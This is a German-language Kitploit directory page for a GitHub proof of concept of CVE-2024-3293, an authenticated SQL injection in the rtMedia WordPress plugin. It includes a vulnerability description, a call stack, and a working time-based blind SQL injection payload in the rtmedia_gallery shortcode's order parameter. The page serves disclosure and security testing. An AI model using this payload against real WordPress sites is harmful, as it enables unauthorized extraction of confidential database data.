Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-3293-Poc — CVE-2024-3293 rtMedia für WordPress, BuddyPress und bbPress <= 4.6.18 - Authentifizierte (Contributor+) SQL-Injection über den rtmedia_gallery Shortcode | Kitploit
Tools/GitHubGitHub/truonghuuphuc/cve-2024-3293-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubtruonghuuphuc/cve-2024-3293-poc

CVE-2024-3293-Poc

CVE-2024-3293 rtMedia für WordPress, BuddyPress und bbPress <= 4.6.18 - Authentifizierte (Contributor+) SQL-Injection über den rtmedia_gallery Shortcode

Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-3293-Poc

rtMedia für WordPress, BuddyPress und bbPress <= 4.6.18 - Authentifizierte (Contributor+) SQL-Injection über rtmedia_gallery Shortcode

Beschreibung

Das rtMedia für WordPress, BuddyPress und bbPress Plugin für WordPress ist in allen Versionen bis einschließlich 4.6.18 anfällig für blinde SQL-Injection über den rtmedia_gallery Shortcode, da der vom Benutzer bereitgestellte Parameter unzureichend maskiert (escaped) wird und die bestehende SQL-Abfrage nicht ausreichend vorbereitet wird. Dies ermöglicht es authentifizierten Angreifern mit Contributor-Zugriff oder höher, zusätzliche SQL-Abfragen an bereits bestehende Abfragen anzuhängen, die dazu verwendet werden können, vertrauliche Informationen aus der Datenbank zu extrahieren.

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress-media/rtmedia-for-wordpress-buddypress-and-bbpress-4618-authenticated-contributor-sql-injection-via-rtmedia-gallery-shortcode

AUFRUFSTAPEL

root@kitploit:~
RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)

Payload:

root@kitploit:~
[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]

image

image

Payload true:

image

Payload false:

image

Tool herunterladen